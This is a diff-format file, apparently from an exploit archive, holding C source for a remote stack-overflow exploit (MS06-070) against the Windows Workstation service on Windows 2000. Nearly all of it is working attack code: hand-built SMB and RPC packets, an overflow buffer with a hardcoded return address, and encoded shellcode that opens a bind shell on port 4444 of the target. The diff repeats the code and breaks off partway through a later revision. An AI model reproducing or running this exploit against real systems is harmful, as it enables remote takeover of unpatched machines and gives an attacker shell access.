-"\x91\xb2\xdb\xbf\x4a\xf6\xdb\x96\x52\x59\x2c\xd6\x16\xd3\xbf\x58"
-"\x21\xca\xdb\x8c\x4e\xd3\xbb\x9a\xe5\xe6\xdb\xd2\x80\xe3\x90\x4a"
-"\xc2\x56\x90\xa7\x69\x13\x9a\xde\x6f\x10\xbb\x27\x55\x86\x74\xfb"
-"\x1b\x37\xdb\x8c\x4a\xd3\xbb\xb5\xe5\xde\x1b\x58\x31\xce\x51\x38"
-"\x6d\xfe\xdb\x5a\x02\xf6\x4c\xb2\xad\xe3\x8b\xb7\xe5\x91\x60\x58"
-"\x2e\xde\xdb\xa3\x72\x7f\xdb\x93\x66\x8c\x38\x5d\x20\xdc\xbc\x83"
-"\x91\x04\x36\x80\x08\xba\x63\xe1\x06\xa5\x23\xe1\x31\x86\xaf\x03"
-"\x06\x19\xbd\x2f\x55\x82\xaf\x05\x31\x5b\xb5\xb5\xef\x3f\x58\xd1"
-"\x3b\xb8\x52\x2c\xbe\xba\x89\xda\x9b\x7f\x07\x2c\xb8\x81\x03\x80"
-"\x3d\x81\x13\x80\x2d\x81\xaf\x03\x08\xba\x41\x8f\x08\x81\xd9\x32"
-"\xfb\xba\xf4\xc9\x1e\x15\x07\x2c\xb8\xb8\x40\x82\x3b\x2d\x80\xbb"
-"\xca\x7f\x7e\x3a\x39\x2d\x86\x80\x3b\x2d\x80\xbb\x8b\x9b\xd6\x9a"
-"\x39\x2d\x86\x83\x3a\x86\x05\x2c\xbe\x41\x38\x34\x17\x14\x29\x84"
-"\x91\x04\x05\x2c\xbe\xb4\x3a\xb7\x08\xba\x33\xbe\xe7\x37\x3a\x83"
-"\x37\xfb\x9c\x5a\x89\xb8\x14\x5a\x8c\xe3\x90\x20\xc4\x2c\x12\xfe"
-"\x90\x90\x7c\x40\xe3\xa8\x68\x78\xc5\x79\x38\xa1\x90\x61\x46\x2c"
-"\x1b\x96\xaf\x05\x35\x85\x02\x82\x3f\x83\x3a\xd2\x3f\x83\x05\x82"
-"\x91\x02\x38\x7e\xb7\xd7\x9e\x80\x91\x04\x3a\x2c\x91\xe5\xaf\x03"
-"\xe5\x85\xac\x50\xaa\xb6\xaf\x05\x3c\x2d\x80\xbb\x9e\x58\x54\x8c"
-"\x3d\x2d\x86\x2c\xbe\xd2\x50\xd3";
-
-
-DWORD    fill_len_1 =0x84c;     //fill data
-DWORD    fill_len_2 =0x1000;    //fill rubbish data
-DWORD    addr_jmp_ebx=0x77f81573;   //jmp ebx address,in ntdll.dll
-unsigned char  code_jmp8[]=      //jmp 8
-"\xEB\x06\x90\x90";
-
-unsigned char  *Rpc_NetrJoinDomain2=NULL;
-DWORD    dwRpc_NetrJoinDomain2=0;
-
-
-unsigned char  recvbuff[2048];
-
-
-void showinfo(void)
-{
- printf("Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit\n");
- printf("by cocoruder(frankruder_at_hotmail.com),2006.10.15\n");
- printf("page:http://ruder.cdut.net/default.asp\n\n");
- printf("successfully test on Windows 2000 Server SP4(chinese)\n\n");
- printf("usage:\n");
- printf("ms06070 targetip DomainName\n\n");
- printf("notice:\n");
- printf("Make sure the DomainName is valid and live,more informations
-see\n");
-printf("http://research.eeye.com/html/advisories/published/AD20061114.html,\n");
- printf("cocoruder just research the vulnerability and give the exploit for Win2000.\n\n\n");
-
-}
-
-void neg ( int s )
-{
- char response[1024];
-
- memset(response,0,sizeof(response));
-
- send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0);
-}
-
-
-
-void MakeAttackPacket(char *lpDomainNameStr)
-{
- DWORD  j,len,b_flag;
-
-
-
- dwDomainNameLen=(strlen(lpDomainNameStr)+2)*2;
- lpDomainName=(unsigned char *)malloc(dwDomainNameLen);
-
- memset(lpDomainName,0,dwDomainNameLen);
-
-MultiByteToWideChar(CP_ACP,0,lpDomainNameStr,-1,(LPWSTR)lpDomainName,dwDomainNameLen);
-
- *(unsigned char *)(lpDomainName+dwDomainNameLen-2)=0x5C;
- *(unsigned char *)(lpDomainName+dwDomainNameLen-4)=0x5C;
-
- len=dwDomainNameLen+     //DomainName
- fill_len_1-3*2+      //fill_len_1
- 4+         //jmp 8
- 4+         //addr jmp ebx
- sizeof(shellcode)-1+    //shellcode
- fill_len_2+       //fill_len_2
- 2;         //0x0000
-
- b_flag=0;
- if (len%2==1)
- {
- len++;
- b_flag=1;
- }
-
-
- dwRpc_NetrJoinDomain2=sizeof(Rpc_NetrJoinDomain2_Header)-1+
-       len+
-       sizeof(Rpc_NetrJoinDomain2_End)-1; //end
-
-
- //malloc
- Rpc_NetrJoinDomain2=(unsigned char *)malloc(dwRpc_NetrJoinDomain2);
- if (Rpc_NetrJoinDomain2==NULL)
- {
- printf("malloc error!\n");
- return;
- }
-
- //fill nop
- memset(Rpc_NetrJoinDomain2,0x90,dwRpc_NetrJoinDomain2);
-
-
- j=sizeof(Rpc_NetrJoinDomain2_Header)-1;
-
- //update para1 length
- *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x0c)=len/2;
- *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x04)=len/2;
-
-
- //copy header
-
-memcpy(Rpc_NetrJoinDomain2,Rpc_NetrJoinDomain2_Header,sizeof(Rpc_NetrJoinDomain2_Header)-1);
-
- j=sizeof(Rpc_NetrJoinDomain2_Header)-1;
-
- //copy DomainName
- memcpy(Rpc_NetrJoinDomain2+j,lpDomainName,dwDomainNameLen);
- j=j+dwDomainNameLen;
-
- //calculate offset
- j=j+fill_len_1-3*2;
-
- //jmp 8
- memcpy(Rpc_NetrJoinDomain2+j,code_jmp8,sizeof(code_jmp8)-1);
- j=j+4;
-
- //jmp ebx address
- *(DWORD *)(Rpc_NetrJoinDomain2+j)=addr_jmp_ebx;
- j=j+4;
-
- //copy shellcode
- memcpy(Rpc_NetrJoinDomain2+j,shellcode,sizeof(shellcode)-1);
- j=j+sizeof(shellcode)-1;
-
- //fill data
- memset(Rpc_NetrJoinDomain2+j,0x41,fill_len_2);
- j=j+fill_len_2;
-
- //0x0000(NULL)
- if (b_flag==0)
- {
- Rpc_NetrJoinDomain2[j]=0x00;
- Rpc_NetrJoinDomain2[j+1]=0x00;
- j=j+2;
- }
- else if (b_flag==1)
- {
- Rpc_NetrJoinDomain2[j]=0x00;
- Rpc_NetrJoinDomain2[j+1]=0x00;
- Rpc_NetrJoinDomain2[j+2]=0x00;
- j=j+3;
- }
-
-
- //copy other parameter
-
-memcpy(Rpc_NetrJoinDomain2+j,Rpc_NetrJoinDomain2_End,sizeof(Rpc_NetrJoinDomain2_End)-1);
-
- j=j+sizeof(Rpc_NetrJoinDomain2_End)-1;
-
-
-}
-
-
-
-void main(int argc,char **argv)
-{
- WSADATA    ws;
- struct sockaddr_in server;
-   SOCKET    sock;
- DWORD    ret;
- WORD    userid,treeid,fid;
-
-
- showinfo();
-
- return;
-
- WSAStartup(MAKEWORD(2,2),&ws);
-
-
-
-
-   sock = socket(AF_INET,SOCK_STREAM,0);
-   if(sock<=0)
- {
-       return;
- }
-
-   server.sin_family = AF_INET;
-   server.sin_addr.s_addr = inet_addr(argv[1]);
-   server.sin_port = htons((USHORT)445);
-
- printf("[+] Connecting %s\n",argv[1]);
-
-   ret=connect(sock,(struct sockaddr *)&server,sizeof(server));
- if (ret==-1)
- {
- printf("connect error!\n");
- return;
- }
-
-
- neg(sock);
-
- recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
-
- ret=send(sock,(char *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0);
- if (ret<=0)
- {
- printf("send Session_Setup_AndX_Request error!\n");
- return;
- }
- recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
-
- userid=*(WORD *)(recvbuff+0x20);       //get userid
-
-
- memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2); //update userid
-
-
- ret=send(sock,(char *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0);
- if (ret<=0)
- {
- printf("send TreeConnect_AndX_Request error!\n");
- return;
- }
- recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
-
- treeid=*(WORD *)(recvbuff+0x1c);       //get treeid
-
-
- //send NTCreate_AndX_Request
- memcpy(NTCreate_AndX_Request+0x20,(char *)&userid,2);  //update userid
- memcpy(NTCreate_AndX_Request+0x1c,(char *)&treeid,2);  //update treeid
-
-
- ret=send(sock,(char
-*)NTCreate_AndX_Request,sizeof(NTCreate_AndX_Request)-1,0);
- if (ret<=0)
- {
- printf("send NTCreate_AndX_Request error!\n");
- return;
- }
- recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
-
-
- fid=*(WORD *)(recvbuff+0x2a);        //get fid
-
-
- //rpc bind
-
- memcpy(Rpc_Bind_Wkssvc+0x20,(char *)&userid,2);
- memcpy(Rpc_Bind_Wkssvc+0x1c,(char *)&treeid,2);
- memcpy(Rpc_Bind_Wkssvc+0x43,(char *)&fid,2);
- *(DWORD *)Rpc_Bind_Wkssvc=htonl(sizeof(Rpc_Bind_Wkssvc)-1-4);
-
- ret=send(sock,(char *)Rpc_Bind_Wkssvc,sizeof(Rpc_Bind_Wkssvc)-1,0);
- if (ret<=0)
- {
- printf("send Rpc_Bind_Wkssvc error!\n");
- return;
- }
- recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
-
-
- MakeAttackPacket((char *)argv[2]);
-
-
- memcpy(Rpc_NetrJoinDomain2+0x20,(char *)&userid,2);
- memcpy(Rpc_NetrJoinDomain2+0x1c,(char *)&treeid,2);
- memcpy(Rpc_NetrJoinDomain2+0x43,(char *)&fid,2);
- *(DWORD *)Rpc_NetrJoinDomain2=htonl(dwRpc_NetrJoinDomain2-4);
-
- *(WORD *)(Rpc_NetrJoinDomain2+0x27)=dwRpc_NetrJoinDomain2-0x58;  //update Total Data Count
- *(WORD *)(Rpc_NetrJoinDomain2+0x3b)=dwRpc_NetrJoinDomain2-0x58;  //update Data Count
- *(WORD *)(Rpc_NetrJoinDomain2+0x45)=dwRpc_NetrJoinDomain2-0x47;  //update Byte Count
- *(WORD *)(Rpc_NetrJoinDomain2+0x60)=dwRpc_NetrJoinDomain2-0x58;  //update Frag Length
-
- ret=send(sock,(char *)Rpc_NetrJoinDomain2,dwRpc_NetrJoinDomain2,0);
- if (ret<=0)
- {
- printf("send Rpc_NetrJoinDomain2 error!\n");
- return;
- }
-
- printf("[+] Send attack packet successfully.telnet %s:4444?\n",argv[1]);
-
- recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
-
-
-
-
- closesocket(sock);
-
-}
-
-// milw0rm.com [2006-11-16]
+/***************************************************************************
+
+Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit
+
+by cocoruder(frankruder_at_hotmail.com),2006.11.15
+page:http://ruder.cdut.net/default.asp
+
+successfully test on Windows 2000 Server SP4(chinese)
+
+usage:
+ms06070 targetip DomainName
+
+notice:
+Make sure the DomainName is valid and live,more informations see
+http://research.eeye.com/html/advisories/published/AD20061114.html,
+cocoruder just research the vulnerability and give the exploit for
+Win2000.
+****************************************************************************/
+
+
+#include <stdio.h>
+#include <windows.h>
+#include <winsock.h>
+#include <tchar.h>
+
+
+unsigned char SmbNeg[] =
+"\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x88\x05\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54"
+"\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00";
+
+
+unsigned char Session_Setup_AndX_Request[]=
+"\x00\x00\x00\x48\xff\x53\x4d\x42\x73\x00"
+"\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\xff\xff\x88\x05\x00\x00\x00\x00\x0d\xff\x00\x00\x00\xff"
+"\xff\x02\x00\x88\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x6e\x74\x00\x70\x79\x73\x6d"
+"\x62\x00";
+
+
+unsigned char TreeConnect_AndX_Request[]=
+"\x00\x00\x00\x58\xff\x53\x4d\x42\x75\x00"
+"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\xff\xfe\x00\x08\x00\x03\x04\xff\x00\x58\x00\x08"
+"\x00\x01\x00\x2d\x00\x00\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
+"\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x36\x00"
+"\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f\x3f"
+"\x3f\x00";
+
+
+unsigned char NTCreate_AndX_Request[]=
+"\x00\x00\x00\x64\xff\x53\x4d\x42\xa2\x00"
+"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x08\x04\x0c\x00\x08\x00\x01\x18\xff\x00\xde\xde\x00"
+"\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00\x9f\x01\x02\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00"
+"\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00\x01\x11\x00\x00\x5c\x00"
+"\x77\x00\x6b\x00\x73\x00\x73\x00\x76\x00\x63\x00\x00\x00";
+
+
+unsigned char Rpc_Bind_Wkssvc[]=
+"\x00\x00\x00\x92\xff\x53\x4d\x42\x25\x00"
+"\x00\x00\x00\x18\x01\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x01\x08\xf0\x0b\x03\x08\xf7\x4c\x10\x00\x00\x48\x00\x00"
+"\x04\xe0\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4a"
+"\x00\x48\x00\x4a\x00\x02\x00\x26\x00\x01\x40\x4f\x00\x5c\x50\x49"
+"\x50\x45\x5c\x00\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00"
+"\x00\x00\x00\x00\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00"
+"\x00\x00\x01\x00\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3"
+"\xf8\x7e\x34\x5a\x01\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11"
+"\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00";
+
+
+unsigned char Rpc_NetrJoinDomain2_Header[]=
+"\x00\x00\x00\xa8\xff\x53\x4d\x42\x25\x00"
+"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x08\x6c\x07\x00\x08\xc0\x01\x10\x00\x00\x54\x00\x00"
+"\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54"
+"\x00\x54\x00\x54\x00\x02\x00\x26\x00\x00\x40\x65\x00\x00\x5c\x00"
+"\x50\x00\x49\x00\x50\x00\x45\x00\x5c\x00\x00\x00\x00\x00\x05\x00"
+"\x00\x03\x10\x00\x00\x00\x54\x00\x00\x00\x01\x00\x00\x00\x3c\x00"
+"\x00\x00\x00\x00"
+"\x16\x00"     //opnum,NetrJoinDomain2
+"\x30\x2a\x42\x00"
+"\x0e\x00\x00\x00"
+"\x00\x00\x00\x00"
+"\x0e\x00\x00\x00"
+"\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
+"\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x31\x00"
+"\x00\x00"
+"\x10\x01\x00\x00"
+"\x00\x00\x00\x00"
+"\x10\x01\x00\x00";
+
+
+unsigned char Rpc_NetrJoinDomain2_End[]=
+"\x00\x00\x00\x00"
+"\x00\x00\x00\x00"
+"\x00\x00\x00\x00"
+"\x01\x00\x00\x00";
+
+
+unsigned char *lpDomainName=NULL;
+DWORD   dwDomainNameLen=0;
+
+
+
+/* win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub
+http://metasploit.com */
+unsigned char shellcode[] =
+"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6e"
+"\xd2\x50\xd3\x83\xeb\xfc\xe2\xf4\x92\xb8\xbb\x9e\x86\x2b\xaf\x2c"
+"\x91\xb2\xdb\xbf\x4a\xf6\xdb\x96\x52\x59\x2c\xd6\x16\xd3\xbf\x58"
+"\x21\xca\xdb\x8c\x4e\xd3\xbb\x9a\xe5\xe6\xdb\xd2\x80\xe3\x90\x4a"
+"\xc2\x56\x90\xa7\x69\x13\x9a\xde\x6f\x10\xbb\x27\x55\x86\x74\xfb"
+"\x1b\x37\xdb\x8c\x4a\xd3\xbb\xb5\xe5\xde\x1b\x58\x31\xce\x51\x38"
+"\x6d\xfe\xdb\x5a\x02\xf6\x4c\xb2\xad\xe3\x8b\xb7\xe5\x91\x60\x58"
+"\x2e\xde\xdb\xa3\x72\x7f\xdb\x93\x66\x8c\x38\x5d\x20\xdc\xbc\x83"
+"\x91\x04\x36\x80\x08\xba\x63\xe1\x06\xa5\x23\xe1\x31\x86\xaf\x03"
+"\x06\x19\xbd\x2f\x55\x82\xaf\x05\x31\x5b\xb5\xb5\xef\x3f\x58\xd1"
+"\x3b\xb8\x52\x2c\xbe\xba\x89\xda\x9b\x7f\x07\x2c\xb8\x81\x03\x80"
+"\x3d\x81\x13\x80\x2d\x81\xaf\x03\x08\xba\x41\x8f\x08\x81\xd9\x32"
+"\xfb\xba\xf4\xc9\x1e\x15\x07\x2c\xb8\xb8\x40\x82\x3b\x2d\x80\xbb"
+"\xca\x7f\x7e\x3a\x39\x2d\x86\x80\x3b\x2d\x80\xbb\x8b\x9b\xd6\x9a"
+"\x39\x2d\x86\x83\x3a\x86\x05\x2c\xbe\x41\x38\x34\x17\x14\x29\x84"
+"\x91\x04\x05\x2c\xbe\xb4\x3a\xb7\x08\xba\x33\xbe\xe7\x37\x3a\x83"
+"\x37\xfb\x9c\x5a\x89\xb8\x14\x5a\x8c\xe3\x90\x20\xc4\x2c\x12\xfe"
+"\x90\x90\x7c\x40\xe3\xa8\x68\x78\xc5\x79\x38\xa1\x90\x61\x46\x2c"
+"\x1b\x96\xaf\x05\x35\x85\x02\x82\x3f\x83\x3a\xd2\x3f\x83\x05\x82"
+"\x91\x02\x38\x7e\xb7\xd7\x9e\x80\x91\x04\x3a\x2c\x91\xe5\xaf\x03"
+"\xe5\x85\xac\x50\xaa\xb6\xaf\x05\x3c\x2d\x80\xbb\x9e\x58\x54\x8c"
+"\x3d\x2d\x86\x2c\xbe\xd2\x50\xd3";
+
+
+DWORD    fill_len_1 =0x84c;     //fill data
+DWORD    fill_len_2 =0x1000;    //fill rubbish data
+DWORD    addr_jmp_ebx=0x77f81573;   //jmp ebx address,in ntdll.dll
+unsigned char  code_jmp8[]=      //jmp 8
+"\xEB\x06\x90\x90";
+
+unsigned char  *Rpc_NetrJoinDomain2=NULL;
+DWORD    dwRpc_NetrJoinDomain2=0;
+
+
+unsigned char  recvbuff[2048];
+
+
+void showinfo(void)
+{
+ printf("Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit\n");
+ printf("by cocoruder(frankruder_at_hotmail.com),2006.10.15\n");
+ printf("page:http://ruder.cdut.net/default.asp\n\n");
+ printf("successfully test on Windows 2000 Server SP4(chinese)\n\n");
+ printf("usage:\n");
+ printf("ms06070 targetip DomainName\n\n");
+ printf("notice:\n");
+ printf("Make sure the DomainName is valid and live,more informations
+see\n");
+printf("http://research.eeye.com/html/advisories/published/AD20061114.html,\n");
+ printf("cocoruder just research the vulnerability and give the exploit for Win2000.\n\n\n");
+
+}
+
+void neg ( int s )
+{
+ char response[1024];
+
+ memset(response,0,sizeof(response));
+
+ send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0);
+}
+
+
+
+void MakeAttackPacket(char *lpDomainNameStr)
+{
+ DWORD  j,len,b_flag;
+
+
+
+ dwDomainNameLen=(strlen(lpDomainNameStr)+2)*2;
+ lpDomainName=(unsigned char *)malloc(dwDomainNameLen);
+
+ memset(lpDomainName,0,dwDomainNameLen);
+
+MultiByteToWideChar(CP_ACP,0,lpDomainNameStr,-1,(LPWSTR)lpDomainName,dwDomainNameLen);
+
+ *(unsigned char *)(lpDomainName+dwDomainNameLen-2)=0x5C;
+ *(unsigned char *)(lpDomainName+dwDomainNameLen-4)=0x5C;
+
+ len=dwDomainNameLen+     //DomainName
+ fill_len_1-3*2+      //fill_len_1
+ 4+         //jmp 8
+ 4+         //addr jmp ebx
+ sizeof(shellcode)-1+    //shellcode
+ fill_len_2+       //fill_len_2
+ 2;         //0x0000
+
+ b_flag=0;
+ if (len%2==1)
+ {
+ len++;
+ b_flag=1;
+ }
+
+
+ dwRpc_NetrJoinDomain2=sizeof(Rpc_NetrJoinDomain2_Header)-1+
+       len+
+       sizeof(Rpc_NetrJoinDomain2_End)-1; //end
+
+
+ //malloc
+ Rpc_NetrJoinDomain2=(unsigned char *)malloc(dwRpc_NetrJoinDomain2);
+ if (Rpc_NetrJoinDomain2==NULL)
+ {
+ printf("malloc error!\n");
+ return;
+ }
+
+ //fill nop
+ memset(Rpc_NetrJoinDomain2,0x90,dwRpc_NetrJoinDomain2);
+
+
+ j=sizeof(Rpc_NetrJoinDomain2_Header)-1;
+
+ //update para1 length
+ *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x0c)=len/2;
+ *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x04)=len/2;
+
+
+ //copy header
+
+memcpy(Rpc_NetrJoinDomain2,Rpc_NetrJoinDomain2_Header,sizeof(Rpc_NetrJoinDomain2_Header)-1);
+
+ j=sizeof(Rpc_NetrJoinDomain2_Header)-1;
+
+ //copy DomainName
+ memcpy(Rpc_NetrJoinDomain2+j,lpDomainName,dwDomainNameLen);
+ j=j+dwDomainNameLen;
+
+ //calculate offset
+ j=j+fill_len_1-3*2;
+
+ //jmp 8
+ memcpy(Rpc_NetrJoinDomain2+j,code_jmp8,sizeof(code_jmp8)-1);
+ j=j+4;
+
+ //jmp ebx address
+ *(DWORD *)(Rpc_NetrJoinDomain2+j)=addr_jmp_ebx;
+ j=j+4;
+
+ //copy shellcode
+ memcpy(Rpc_NetrJoinDomain2+j,shellcode,sizeof(shellcode)-1);
+ j=j+sizeof(shellcode)-1;
+
+ //fill data
+ memset(Rpc_NetrJoinDomain2+j,0x41,fill_len_2);
+ j=j+fill_len_2;
+
+ //0x0000(NULL)
+ if (b_flag==0)
+ {
+ Rpc_NetrJoinDomain2[j]=0x00;
+ Rpc_NetrJoinDomain2[j+1]=0x00;
+ j=j+2;
+ }
+ else if (b_flag==1)
+ {
+ Rpc_NetrJoinDomain2[j]=0x00;
+ Rpc_NetrJoinDomain2[j+1]=0x00;
+ Rpc_NetrJoinDomain2[j+2]=0x00;
+ j=j+3;
+ }
+
+
+ //copy other parameter
+
+memcpy(Rpc_NetrJoinDomain2+j,Rpc_NetrJoinDomain2_End,sizeof(Rpc_NetrJoinDomain2_End)-1);
+
+ j=j+sizeof(Rpc_NetrJoinDomain2_End)-1;
+
+
+}
+
+
+
+void main(int argc,char **argv)
+{
+ WSADATA    ws;
+ struct sockaddr_in server;
+   SOCKET    sock;
+ DWORD    ret;
+ WORD    userid,treeid,fid;
+
+
+ showinfo();
+
+ return;
+
+ WSAStartup(MAKEWORD(2,2),&ws);
+
+
+
+
+   sock = socket(AF_INET,SOCK_STREAM,0);
+   if(sock<=0)
+ {
+       return;
+ }
+
+   server.sin_family = AF_INET;
+   server.sin_addr.s_addr = inet_addr(argv[1]);
+   server.sin_port = htons((USHORT)445);
+
+ printf("[+] Connecting %s\n",argv[1]);
+
+   ret=connect(sock,(struct sockaddr *)&server,sizeof(server));
+ if (ret==-1)
+ {
+ printf("connect error!\n");
+ return;
+ }
+
+
+ neg(sock);
+
+ recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
+
+ ret=send(sock,(char *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0);
+ if (ret<=0)
+ {
+ printf("send Session_Setup_AndX_Request error!\n");
+ return;
+ }
+ recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
+
+ userid=*(WORD *)(recvbuff+0x20);       //get userid
+
+
+ memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2); //update userid
+
+
+ ret=send(sock,(char *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0);
+ if (ret<=0)
+ {
+ printf("send TreeConnect_AndX_Request error!\n");
+ return;
+ }
+ recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
+
+ treeid=*(WORD *)(recvbuff+0x1c);       //get treeid
+
+
+ //send NTCreate_AndX_Request
+ memcpy(NTCreate_AndX_Request+0x20,(char *)&userid,2);  //update userid
+ memcpy(NTCreate_AndX_Request+0x1c,(char *)&treeid,2);  //update treeid
+
+
+ ret=send(sock,(char
+*)NTCreate_AndX_Request,sizeof(NTCreate_AndX_Request)-1,0);
+ if (ret<=0)
+ {
+ printf("send NTCreate_AndX_Request error!\n");
+ return;
+ }
+ recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
+
+
+ fid=*(WORD *)(recvbuff+0x2a);        //get fid
+
+
+ //rpc bind
+
+ memcpy(Rpc_Bind_Wkssvc+0x20,(char *)&userid,2);
+ memcpy(Rpc_Bind_Wkssvc+0x1c,(char *)&treeid,2);
+ memcpy(Rpc_Bind_Wkssvc+0x43,(char *)&fid,2);
+ *(DWORD *)Rpc_Bind_Wkssvc=htonl(sizeof(Rpc_Bind_Wkssvc)-1-4);
+
+ ret=send(sock,(char *)Rpc_Bind_Wkssvc,sizeof(Rpc_Bind_Wkssvc)-1,0);
+ if (ret<=0)
+ {
+ printf("send Rpc_Bind_Wkssvc error!\n");
+ return;
+ }
+ recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
+
+
+ MakeAttackPacket((char *)argv[2]);
+
+
+ memcpy(Rpc_NetrJoinDomain2+0x20,(char *)&userid,2);
+ memcpy(Rpc_NetrJoinDomain2+0x1c,(char *)&treeid,2);
+ memcpy(Rpc_NetrJoinDomain2+0x43,(char *)&fid,2);
+ *(DWORD *)Rpc_NetrJoinDomain2=htonl(dwRpc_NetrJoinDomain2-4);
+
+ *(WORD *)(Rpc_NetrJoinDomain2+0x27)=dwRpc_NetrJoinDomain2-0x58;  //update Total Data Count
+ *(WORD *)(Rpc_NetrJoinDomain2+0x3b)=dwRpc_NetrJoinDomain2-0x58;  //update Data Count
+ *(WORD *)(Rpc_NetrJoinDomain2+0x45)=dwRpc_NetrJoinDomain2-0x47;  //update Byte Count
+ *(WORD *)(Rpc_NetrJoinDomain2+0x60)=dwRpc_NetrJoinDomain2-0x58;  //update Frag Length
+
+ ret=send(sock,(char *)Rpc_NetrJoinDomain2,dwRpc_NetrJoinDomain2,0);
+ if (ret<=0)
+ {
+ printf("send Rpc_NetrJoinDomain2 error!\n");
+ return;
+ }
+
+ printf("[+] Send attack packet successfully.telnet %s:4444?\n",argv[1]);
+
+ recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
+
+
+
+
+ closesocket(sock);
+
+}
+
+// milw0rm.com [2006-11-16]

platforms/windows/remote/2800.cpp

@@ -1,423 +1,423 @@
-/***************************************************************************
-
-Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit
-
-by cocoruder(frankruder_at_hotmail.com),2006.11.15
-page:http://ruder.cdut.net/default.asp
-
-Code fixed by S A Stevens - 17.11.2006 - changed shellcode, Changed code to
-correct jmp EBX address and fixed exploit output status.
-
-Greetz to InTel
-
-Should work on Windows 2000 Server SP4 (All Languages)
-
-
-usage:
-ms06070 targetip DomainName
-
-notice:
-Make sure the DomainName is valid and live,more informations see
-http://research.eeye.com/html/advisories/published/AD20061114.html,
-cocoruder just research the vulnerability and give the exploit for
-Win2000.
-****************************************************************************/
-
-
-#include <stdio.h>
-#include <windows.h>
-#include <winsock.h>
-#include <tchar.h>
-#pragma comment(lib, "wsock32.lib")
-
-
-unsigned char SmbNeg[] =
-"\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x88\x05\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54"
-"\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00";
-
-
-unsigned char Session_Setup_AndX_Request[]=
-"\x00\x00\x00\x48\xff\x53\x4d\x42\x73\x00"
-"\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\xff\xff\x88\x05\x00\x00\x00\x00\x0d\xff\x00\x00\x00\xff"
-"\xff\x02\x00\x88\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x6e\x74\x00\x70\x79\x73\x6d"
-"\x62\x00";
-
-
-unsigned char TreeConnect_AndX_Request[]=
-"\x00\x00\x00\x58\xff\x53\x4d\x42\x75\x00"
-"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\xff\xfe\x00\x08\x00\x03\x04\xff\x00\x58\x00\x08"
